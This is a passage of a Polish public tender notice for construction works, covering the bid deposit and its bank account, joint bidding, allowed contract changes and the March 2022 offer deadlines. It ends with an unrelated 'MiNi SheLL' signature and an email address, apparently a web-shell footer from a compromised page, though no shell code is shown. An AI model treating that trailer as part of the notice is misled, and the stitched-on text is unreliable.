zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia; 21.4. Oświadczenie Wykonawcy o<br/>niepodleganiu wykluczeniu z postępowania o udzielenie Zamówienia oraz o spełnienie<br/>warunków udziału w postepowaniu - oświadczenie Załącznik nr 5<br/>do SWZ.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepoleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu<br/>składa każdy z Wykonawców.<br/>W przypadku powoływania się na zasoby podmiotu trzeciego Wykonawca, w przypadku<br/>polegania na zdolnościach technicznych lub podmiotów udostępniających zasoby, przedstawia<br/>wraz z oświadczeniem, o którym wyżej mowa, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby(załącznik nr 5a do SWZ).<br/>21.5. Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby, do oddania do dyspozycji<br/>Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (o ile Wykonawca korzysta ze zdolności innych<br/>podmiotów na zasadach określonych w art. 118 ustawy). Zobowiązanie lub inny podmiotowy<br/>środek dowodowy w opisywanym zakresie, przekazuje się w postaci elektronicznej, i opatruje<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W<br/>przypadku, gdy zobowiązanie (inny podmiotowy środek dowodowy) zostało wystawione w<br/>postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie<br/>tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej.<br/>21.6. Dowód wpłaty wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 3 000,00 zł.<br/>2. Wadium winno być wniesione przed upływem terminu składania ofert w następujących<br/>formach, w zależności od wyboru Wykonawcy:<br/>a. pieniądzu, przelewem na rachunek bankowy Zamawiającego w:<br/>BNP PARIBAS nr rachunku 79 2030 0045 1110 0000 0200 1830; w taki sposób, aby znalazły się<br/>na rachunku Zamawiającego przed upływem terminu składania ofert.<br/>b. gwarancjach bankowych;<br/>c. gwarancjach ubezpieczeniowych;<br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z<br/>2019r. poz. 310, 836 i 1572).<br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 PZP<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na<br/>przedłużony okres związania ofertą.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt<br/>b-d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.<br/>6. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>8. Złożenie wniosku o zwrot wadium, o którym mowa w ust. 2, powoduje rozwiązanie stosunku<br/>prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX. Ustawy PZP<br/>9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy<br/>rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia<br/>rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy<br/>wskazany przez wykonawcę.<br/>10. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie<br/>gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>11. Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 98 ust. 6 ustawy PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepoleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu<br/>składa każdy z Wykonawców. W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Strony ustalają, iż zmiany do Umowy będą dokonywane zgodnie z przepisami ustawy Kodeks<br/>Cywilny, jeżeli przepisy ustawy PZP nie stanowią inaczej 2.Strony dopuszczają możliwość<br/>zmiany terminu zakończenia robót, o okres trwania przyczyn, z powodu których będzie<br/>zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach: 1) jeżeli<br/>przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą<br/>następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający 2) gdy wystąpią<br/>niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w<br/>szczególności z powodu technologii realizacji prac określonej w normach – tj. silne opady<br/>deszczu powodujące powódź lub podtopienia na placu budowy, silne wiatry sięgające w<br/>porywach powyżej 30m/s 3) gdy wystąpi konieczność wykonania robót zamiennych lub innych<br/>robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej<br/>oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu<br/>Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi<br/>przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych<br/>kolizji, 4) wystąpią opóźnienia w dokonaniu przez właściwe organy administracji państwowej określonych czynności 5) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień,<br/>itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli<br/>opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny<br/>zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność, 6) jeżeli wystąpi brak możliwości wyk. rob. z powodu nie dopuszczania do ich<br/>wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z<br/>przyczyn niezależnych od Wykonawcy, 7) wystąpienia Siły wyższej uniemożliwiającej wykonanie<br/>przedmiotu Umowy zgodnie z jej postanowieniami. 3. Wykonawca jest uprawniony do żądania<br/>zmiany Umowy (jeżeli zakres ten został ujęty w umowie) w zakresie materiałów, parametrów<br/>technicznych, technologii wyk. robót bud., sposobu i zakresu wykonania przedmiotu Umowy w<br/>następujących sytuacjach: 1) konieczności zrealizowania jakiejkolwiek części robót, objętej<br/>przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub<br/>technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych<br/>Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby<br/>zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem<br/>przedmiotu Umowy, 2) konieczności realizacji robót wynikających z wprowadzenia w Dok. proj.<br/>zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a ust.<br/>1 ustawy – Prawo Budowlane niemożliwych do przewidzenia na etapie sporządzania oferty, 3)<br/>wystąpienia warunków geologicznych, geot. lub hydro. odbiegających w sposób istotny od<br/>przyjętych w Dok. proj., rozpoznania terenu w zakresie znalezisk archeologicznych,<br/>występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych<br/>założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, 4) wystąpienia<br/>warunków terenu budowy odbiegających w sposób istotny od przyjętych w Dok. proj., w<br/>szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci,<br/>instalacji lub innych obiektów budowlanych, 5) konieczności zrealizowania przedmiotu Umowy<br/>przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany<br/>obowiązującego prawa, 6) wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle<br/>prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub<br/>usunięcia tych kolizji, 7) wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu<br/>Umowy zgodnie z jej postanowieniami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com